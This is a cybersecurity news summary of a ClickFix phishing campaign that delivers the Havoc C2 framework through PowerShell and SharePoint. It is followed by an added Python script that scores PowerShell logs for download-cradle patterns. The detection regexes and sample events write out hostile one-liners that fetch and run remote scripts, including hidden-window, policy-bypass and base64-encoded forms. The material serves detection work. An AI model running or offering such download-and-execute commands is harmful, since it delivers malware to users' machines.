CyberSecurity news
@cyberalerts.io
A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands, which subsequently deploy the Havoc post-exploitation framework. This framework grants attackers remote access to compromised devices. The attackers conceal the different stages of their malware within SharePoint sites and employ a modified version of Havoc Demon in tandem with the Microsoft Graph API. This tactic is used to obfuscate command-and-control (C2) communications, making them appear as legitimate traffic within trusted Microsoft services.
The attack starts with a phishing email carrying an HTML attachment that, when opened, displays an error message. The message uses the ClickFix technique to trick users into copying a malicious PowerShell command and executing it in their terminal or PowerShell console, thereby triggering the next stage. The command downloads and executes a PowerShell script hosted on a server controlled by the attacker. This script checks for sandboxed environments, downloads the Python interpreter if needed, and executes a Python script serving as a shellcode loader for KaynLdr, launching the Havoc Demon agent on the infected host.
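The chain above hinges on a user-pasted PowerShell one-liner that fetches and runs a remote script. As an added example (not code from the cyberalerts.io summary or from any of the cited reports), the following Python routine triages PowerShell ScriptBlock log text for that pattern: a download cradle combined with Invoke-Expression, a hidden window, an execution-policy bypass, a remote URL, a SharePoint host, or an encoded command. The indicator names, weights, threshold and sample log entries are all constructed for illustration; the regexes are a starting point for a detection rule, not a complete signature set.

```python
"""Triage PowerShell ScriptBlock log text for ClickFix-style download cradles.

Added example: indicator names, weights, the threshold and the sample events
below are constructed assumptions for illustration, not data from the campaign.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# (name, pattern, weight): traits the campaign summary describes. Weights are
# an assumption; a cradle plus Invoke-Expression alone crosses the threshold.
INDICATORS = [
    ("download_cradle",
     re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
                r"DownloadString|DownloadFile)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|iex)\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), 2),
    ("policy_bypass", re.compile(r"-e(p|xecutionpolicy)?\s+bypass\b", re.I), 2),
    ("remote_url", re.compile(r"https?://", re.I), 1),
    ("sharepoint_host", re.compile(r"\.sharepoint\.com\b", re.I), 1),
]
# -EncodedCommand payloads are base64 of UTF-16LE text; handled separately so
# the base64 blob itself never matches the word-based indicators above.
ENCODED_RX = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)
ENCODED_WEIGHT = 2
SUSPICIOUS_THRESHOLD = 5


@dataclass
class Verdict:
    event_id: str
    score: int = 0
    matched: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def expand_encoded(text: str) -> tuple[str, bool]:
    """Replace an encoded-command payload with its decoded text.

    Returns (text_to_scan, was_encoded). An undecodable payload is still
    reported as encoded, since that alone is worth an analyst's attention.
    """
    m = ENCODED_RX.search(text)
    if not m:
        return text, False
    try:
        decoded = base64.b64decode(m.group(3), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text, True
    return text[:m.start(3)] + decoded + text[m.end(3):], True


def score_scriptblock(event_id: str, text: str) -> Verdict:
    """Score one ScriptBlock message; higher means more cradle-like."""
    verdict = Verdict(event_id)
    haystack, was_encoded = expand_encoded(text)
    if was_encoded:
        verdict.score += ENCODED_WEIGHT
        verdict.matched.append("encoded_command")
    for name, pattern, weight in INDICATORS:
        if pattern.search(haystack):
            verdict.score += weight
            verdict.matched.append(name)
    return verdict


def triage(events: dict) -> list:
    """Score a mapping of event id -> ScriptBlock text, keeping input order."""
    return [score_scriptblock(eid, text) for eid, text in events.items()]


# Constructed sample messages resembling the ScriptBlock text of Event ID 4104.
# evt-4 is built here by encoding a constructed command, as -EncodedCommand does.
_ENCODED_PAYLOAD = base64.b64encode(
    "iex (iwr https://example.com/stage2.ps1)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = {
    "evt-1": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length",
    "evt-2": ("powershell -w hidden -ep bypass -c \"iex (iwr "
              "'https://example-tenant.sharepoint.com/sites/docs/stage1.txt' "
              "-UseBasicParsing)\""),
    "evt-3": "Invoke-WebRequest https://example.com/installer.msi -OutFile C:\\Temp\\installer.msi",
    "evt-4": f"powershell -enc {_ENCODED_PAYLOAD}",
}

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{v.event_id}: score={v.score:2d} {flag:10s} {', '.join(v.matched)}")
```

The plain administrator download (evt-3) scores below the threshold while the pasted one-liner (evt-2) and the encoded equivalent (evt-4) are flagged; tune the weights against your own baseline of legitimate ScriptBlock activity before alerting on them.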
References :
- bsky.app: A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access to compromised devices.
- thehackernews.com: Hackers Use ClickFix Trick to Deploy PowerShell-Based Havoc C2 via SharePoint Sites
- BleepingComputer: BleepingComputer post about a new ClickFix phishing campaign.
- Anonymous: A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access to compromised devices.
- Talkback Resources: Hackers Use ClickFix Trick to Deploy PowerShell-Based Havoc C2 via SharePoint Sites [social] [mal]
- Virus Bulletin: Virus Bulletin covers campaign combining ClickFix & multi-stage malware to deploy a modified Havoc Demon Agent.
- Email Security - Blog: Cyber security researchers have discovered a new and sophisticated cyber attack campaign that’s predicated on social engineering and remote access tool use.
Classification:
- HashTags: #ClickFix #HavocC2 #PhishingCampaign
- Company: Microsoft
- Target: Windows Users
- Product: SharePoint
- Feature: Malicious PowerShell execution
- Malware: Havoc
- Type: Hack
- Severity: Major